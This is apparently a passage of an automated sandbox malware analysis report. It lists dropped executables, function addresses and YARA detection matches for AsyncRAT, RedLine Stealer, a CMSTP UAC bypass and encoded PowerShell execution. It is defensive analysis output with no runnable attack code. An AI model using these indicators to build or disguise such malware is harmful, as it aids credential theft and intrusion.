Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Code function: 23_2_0042B4B0	23_2_0042B4B0
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Code function: 23_2_0040B540	23_2_0040B540
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Code function: 23_2_0042ED44	23_2_0042ED44
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Code function: 23_2_00444D50	23_2_00444D50
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Code function: 23_2_00444D69	23_2_00444D69
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Code function: 23_2_0043D570	23_2_0043D570
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Code function: 23_2_0041B500	23_2_0041B500
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Code function: 23_2_00407D20	23_2_00407D20
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Code function: 23_2_00442D3C	23_2_00442D3C
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Code function: 23_2_0042E53D	23_2_0042E53D
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Code function: 23_2_004385C7	23_2_004385C7
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Code function: 23_2_004205BB	23_2_004205BB
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Code function: 23_2_0043F64E	23_2_0043F64E
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Code function: 23_2_00426650	23_2_00426650
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Code function: 23_2_00444C40	23_2_00444C40
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Code function: 23_2_0041FE58	23_2_0041FE58
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Code function: 23_2_00415E70	23_2_00415E70
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Code function: 23_2_00445E70	23_2_00445E70
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Code function: 23_2_00444E70	23_2_00444E70
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Code function: 23_2_00444625	23_2_00444625
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Code function: 23_2_0043CE21	23_2_0043CE21
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Code function: 23_2_0043EE20	23_2_0043EE20
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Code function: 23_2_0041DEF0	23_2_0041DEF0
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Code function: 23_2_00421680	23_2_00421680
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Code function: 23_2_00403E90	23_2_00403E90
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Code function: 23_2_00421EA0	23_2_00421EA0
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Code function: 23_2_00434EAB	23_2_00434EAB
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Code function: 23_2_0042DF66	23_2_0042DF66
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Code function: 23_2_0041A766	23_2_0041A766
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Code function: 23_2_00404772	23_2_00404772
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Code function: 23_2_00444F20	23_2_00444F20
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Code function: 23_2_0043D7D0	23_2_0043D7D0
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Code function: 23_2_0041AFF7	23_2_0041AFF7
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Code function: 23_2_0041BF8A	23_2_0041BF8A
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Code function: 23_2_00424F90	23_2_00424F90
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Code function: 23_2_00444FB0	23_2_00444FB0
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Code function: 23_2_00429FBD	23_2_00429FBD
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	Code function: 35_3_011BEB04	35_3_011BEB04
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	Code function: 35_3_011BEB58	35_3_011BEB58
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	Code function: 35_3_011BEB5C	35_3_011BEB5C
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	Code function: 35_3_011BEB50	35_3_011BEB50
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	Code function: 35_3_011BEB54	35_3_011BEB54
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	Code function: 35_3_011BEB48	35_3_011BEB48
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	Code function: 35_3_011BEB4C	35_3_011BEB4C
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	Code function: 35_3_011BEB44	35_3_011BEB44
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	Code function: 35_3_011BEB98	35_3_011BEB98
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	Code function: 35_3_011BEB9C	35_3_011BEB9C
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	Code function: 35_3_011BEB95	35_3_011BEB95
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	Code function: 35_3_011BEBBF	35_3_011BEBBF
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	Code function: 35_3_011BEBA0	35_3_011BEBA0
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	Code function: 35_3_011BEBDB	35_3_011BEBDB
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	Code function: 35_3_011BEBDF	35_3_011BEBDF
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	Code function: 35_3_011BEBD3	35_3_011BEBD3
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	Code function: 35_3_011BEBD7	35_3_011BEBD7
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	Code function: 35_3_011BEBCB	35_3_011BEBCB
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	Code function: 35_3_011BEBCF	35_3_011BEBCF
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	Code function: 35_3_011BEBC3	35_3_011BEBC3
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	Code function: 35_3_011BEBFB	35_3_011BEBFB
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	Code function: 35_3_011BEBF3	35_3_011BEBF3
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	Code function: 35_3_011BEBF7	35_3_011BEBF7
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	Code function: 35_3_011BEBEB	35_3_011BEBEB
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	Code function: 35_3_011BEBEF	35_3_011BEBEF
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	Code function: 35_3_011BEBE3	35_3_011BEBE3
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	Code function: 35_3_011BEBE7	35_3_011BEBE7
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	Code function: 35_3_011BEB04	35_3_011BEB04
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	Code function: 35_3_011BEB04	35_3_011BEB04
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	Code function: 35_3_011BEB04	35_3_011BEB04

Source: C:\Users\user\AppData\Local\Temp\1072546001\487dac876e.exe	Code function: String function: 004062CF appears 58 times
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Code function: String function: 00418C10 appears 87 times
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	Code function: String function: 0040B230 appears 43 times

Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2416 -s 940

Source: dDFw6mJ[1].exe.6.dr	Static PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, Windows 2000/XP setup, 5870 bytes, 1 file, at 0x2c +A "67a27a89a5061.vbs", ID 1199, number 1, 1 datablock, 0x1503 compression
Source: dDFw6mJ.exe.6.dr	Static PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, Windows 2000/XP setup, 5870 bytes, 1 file, at 0x2c +A "67a27a89a5061.vbs", ID 1199, number 1, 1 datablock, 0x1503 compression

Source: random.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Windows\SysWOW64\cmd.exe	Process created: Commandline size = 2353
Source: C:\Windows\System32\wscript.exe	Process created: Commandline size = 5200
Source: C:\Windows\SysWOW64\cmd.exe	Process created: Commandline size = 2353
Source: C:\Windows\System32\wscript.exe	Process created: Commandline size = 5200

Source: amsi32_2916.amsi.csv, type: OTHER	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: 22.3.Macromedia.com.36a8750.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 22.3.Macromedia.com.36a8750.0.unpack, type: UNPACKEDPE	Matched rule: rat_win_asyncrat author = Sekoia.io, description = Detect AsyncRAT based on specific strings, creation_date = 2023-01-25, classification = TLP:CLEAR, version = 1.0, id = d698e4a1-77ff-4cd7-acb3-27fb16168ceb
Source: 22.3.Macromedia.com.36a8750.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 22.3.Macromedia.com.36a8750.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 22.3.Macromedia.com.36a8750.1.unpack, type: UNPACKEDPE	Matched rule: rat_win_asyncrat author = Sekoia.io, description = Detect AsyncRAT based on specific strings, creation_date = 2023-01-25, classification = TLP:CLEAR, version = 1.0, id = d698e4a1-77ff-4cd7-acb3-27fb16168ceb
Source: 22.3.Macromedia.com.36a8750.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 22.3.Macromedia.com.36a8750.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 22.3.Macromedia.com.36a8750.1.raw.unpack, type: UNPACKEDPE	Matched rule: rat_win_asyncrat author = Sekoia.io, description = Detect AsyncRAT based on specific strings, creation_date = 2023-01-25, classification = TLP:CLEAR, version = 1.0, id = d698e4a1-77ff-4cd7-acb3-27fb16168ceb
Source: 22.3.Macromedia.com.36a8750.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 22.3.Macromedia.com.36a8750.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 22.3.Macromedia.com.36a8750.0.raw.unpack, type: UNPACKEDPE	Matched rule: rat_win_asyncrat author = Sekoia.io, description = Detect AsyncRAT based on specific strings, creation_date = 2023-01-25, classification = TLP:CLEAR, version = 1.0, id = d698e4a1-77ff-4cd7-acb3-27fb16168ceb
Source: 22.3.Macromedia.com.36a8750.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 56.2.Fe36XBk.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 57.2.8b3fbc1053.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 33.2.5a4a47dccd.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 00000016.00000003.2949566723.00000000036A8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 00000016.00000003.2949566723.00000000036A8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 00000016.00000003.3043051709.0000000000E25000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 00000016.00000003.3043051709.0000000000E25000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 00000024.00000003.2579845134.00000000050E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 00000016.00000003.2949566723.0000000003639000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 00000016.00000003.2949566723.0000000003639000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 00000016.00000003.2950687413.00000000036B4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 00000016.00000003.2950687413.00000000036B4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 00000016.00000003.3028948507.00000000036A8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 00000016.00000003.3028948507.00000000036A8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 00000016.00000003.2951079178.0000000000E2C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 00000016.00000003.2951079178.0000000000E2C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 00000016.00000003.3028948507.00000000036C5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 00000016.00000003.3043160239.000000000360B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 00000016.00000003.3028948507.00000000036B5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 00000016.00000003.3028948507.00000000036B5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: Process Memory Space: Macromedia.com PID: 3300, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: Process Memory Space: loqVSeJ.exe PID: 2692, type: MEMORYSTR	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: Process Memory Space: powershell.exe PID: 2916, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution

Source: random.exe	Static PE information: Section: nincghsn ZLIB complexity 0.9942659592245989
Source: skotes.exe.0.dr	Static PE information: Section: nincghsn ZLIB complexity 0.9942659592245989
Source: 4b3b305d14.exe.6.dr	Static PE information: Section: ZLIB complexity 0.9976325757575758
Source: 4b3b305d14.exe.6.dr	Static PE information: Section: jmpbrfec ZLIB complexity 0.9947903009814204
Source: 77c6b3ca0a.exe.6.dr	Static PE information: Section: hzdrddah ZLIB complexity 0.9946993314302884
Source: random[1].exe.6.dr	Static PE information: Section: ZLIB complexity 0.9976325757575758
Source: random[1].exe.6.dr	Static PE information: Section: jmpbrfec ZLIB complexity 0.9947903009814204
Source: dfd80aba08.exe.6.dr	Static PE information: Section: ZLIB complexity 0.9976325757575758
Source: dfd80aba08.exe.6.dr	Static PE information: Section: jmpbrfec ZLIB complexity 0.9947903009814204
Source: random[1].exe0.6.dr	Static PE information: Section: hzdrddah ZLIB complexity 0.9946993314302884
Source: ae70ca0159.exe.6.dr	Static PE information: Section: hzdrddah ZLIB complexity 0.9946993314302884
Source: random[1].exe1.6.dr	Static PE information: Section: .reloc ZLIB complexity 1.002685546875
Source: 487dac876e.exe.6.dr	Static PE information: Section: .reloc ZLIB complexity 1.002685546875
Source: 6bf1f06d50.exe.6.dr	Static PE information: Section: .reloc ZLIB complexity 1.002685546875
Source: 88823343d6.exe.6.dr	Static PE information: Section: .rdata ZLIB complexity 1.0003345630787037
Source: 88823343d6.exe.6.dr	Static PE information: Section: .rdata ZLIB complexity 1.0003345630787037
Source: f3f4cac77b.exe.6.dr	Static PE information: Section: ZLIB complexity 0.9966396545031055
Source: f3f4cac77b.exe.6.dr	Static PE information: Section: rsigopyg ZLIB complexity 0.9938404580722172
Source: random[1].exe2.6.dr	Static PE information: Section: .rdata ZLIB complexity 1.0003345630787037
Source: random[1].exe2.6.dr	Static PE information: Section: .rdata ZLIB complexity 1.0003345630787037
Source: e2b0a87ceb.exe.6.dr	Static PE information: Section: .rdata ZLIB complexity 1.0003345630787037
Source: e2b0a87ceb.exe.6.dr	Static PE information: Section: .rdata ZLIB complexity 1.0003345630787037
Source: random[2].exe.6.dr	Static PE information: Section: ZLIB complexity 0.9966396545031055
Source: random[2].exe.6.dr	Static PE information: Section: rsigopyg ZLIB complexity 0.9938404580722172
Source: 5a4a47dccd.exe.6.dr	Static PE information: Section: ZLIB complexity 0.9966396545031055
Source: 5a4a47dccd.exe.6.dr	Static PE information: Section: rsigopyg ZLIB complexity 0.9938404580722172
Source: loqVSeJ[1].exe.6.dr	Static PE information: Section: ZLIB complexity 0.9962366615853658
Source: loqVSeJ[1].exe.6.dr	Static PE information: Section: efrqcofg ZLIB complexity 0.9946268992219612
Source: loqVSeJ.exe.6.dr	Static PE information: Section: ZLIB complexity 0.9962366615853658
Source: loqVSeJ.exe.6.dr	Static PE information: Section: efrqcofg ZLIB complexity 0.9946268992219612
Source: Bjkm5hE[1].exe.6.dr	Static PE information: Section: ZLIB complexity 1.0004701967592593
Source: Bjkm5hE[1].exe.6.dr	Static PE information: Section: gfrqabhk ZLIB complexity 0.9946444095857272
Source: Bjkm5hE.exe.6.dr	Static PE information: Section: ZLIB complexity 1.0004701967592593
Source: Bjkm5hE.exe.6.dr	Static PE information: Section: gfrqabhk ZLIB complexity 0.9946444095857272
Source: 7fOMOTQ[1].exe.6.dr	Static PE information: Section: rufmbtlx ZLIB complexity 0.994733317669173
Source: 7fOMOTQ.exe.6.dr	Static PE information: Section: rufmbtlx ZLIB complexity 0.994733317669173
Source: Fe36XBk[1].exe.6.dr	Static PE information: Section: ZLIB complexity 0.9960719138198758
Source: Fe36XBk[1].exe.6.dr	Static PE information: Section: apuhhdvg ZLIB complexity 0.994313635778399
Source: Fe36XBk.exe.6.dr	Static PE information: Section: ZLIB complexity 0.9960719138198758
Source: Fe36XBk.exe.6.dr	Static PE information: Section: apuhhdvg ZLIB complexity 0.994313635778399
Source: random[2].exe1.6.dr	Static PE information: Section: ZLIB complexity 0.9957807647515527
Source: random[2].exe1.6.dr	Static PE information: Section: ffzeszud ZLIB complexity 0.9943794300059067
Source: 8b3fbc1053.exe.6.dr	Static PE information: Section: ZLIB complexity 0.9957807647515527
Source: 8b3fbc1053.exe.6.dr	Static PE information: Section: ffzeszud ZLIB complexity 0.9943794300059067
Source: random[3].exe0.6.dr	Static PE information: Section: uoivcdbb ZLIB complexity 0.994119122706422
Source: 318ea12e54.exe.6.dr	Static PE information: Section: uoivcdbb ZLIB complexity 0.994119122706422
Source: random[3].exe2.6.dr	Static PE information: Section: .rdata ZLIB complexity 1.0003335336538461
Source: random[3].exe2.6.dr	Static PE information: Section: .rdata ZLIB complexity 1.0003335336538461

Source: loqVSeJ[1].exe.6.dr	Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: loqVSeJ.exe.6.dr	Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5

Source: 88823343d6.exe.6.dr, s1l70P8mWLYDmBOs6L.cs	Cryptographic APIs: 'CreateDecryptor'
Source: random[1].exe2.6.dr, s1l70P8mWLYDmBOs6L.cs	Cryptographic APIs: 'CreateDecryptor'
Source: e2b0a87ceb.exe.6.dr, s1l70P8mWLYDmBOs6L.cs	Cryptographic APIs: 'CreateDecryptor'
Source: random[3].exe2.6.dr, PjMboxrZKVMRiayL4T.cs	Cryptographic APIs: 'CreateDecryptor'
Source: random[3].exe2.6.dr, PjMboxrZKVMRiayL4T.cs	Cryptographic APIs: 'CreateDecryptor'

Source: 88823343d6.exe.6.dr, Program.cs	Base64 encoded string: 'YTVlY2ZkN2RjODQzZTM5ZTA4ZmE4MWExMzQ2NTFkNjVhNjI2MDEwNDc0ZTJmNzQ3YzUxMDg3MWJjMTc1N2QyMg=='
Source: random[1].exe2.6.dr, Program.cs	Base64 encoded string: 'YTVlY2ZkN2RjODQzZTM5ZTA4ZmE4MWExMzQ2NTFkNjVhNjI2MDEwNDc0ZTJmNzQ3YzUxMDg3MWJjMTc1N2QyMg=='
Source: e2b0a87ceb.exe.6.dr, Program.cs	Base64 encoded string: 'YTVlY2ZkN2RjODQzZTM5ZTA4ZmE4MWExMzQ2NTFkNjVhNjI2MDEwNDc0ZTJmNzQ3YzUxMDg3MWJjMTc1N2QyMg=='
Source: random[3].exe2.6.dr, Program.cs	Base64 encoded string: 'YTVlY2ZkN2RjODQzZTM5ZTA4ZmE4MWExMzQ2NTFkNjVhNjI2MDEwNDc0ZTJmNzQ3YzUxMDg3MWJjMTc1N2QyMg=='

Source: classification engine

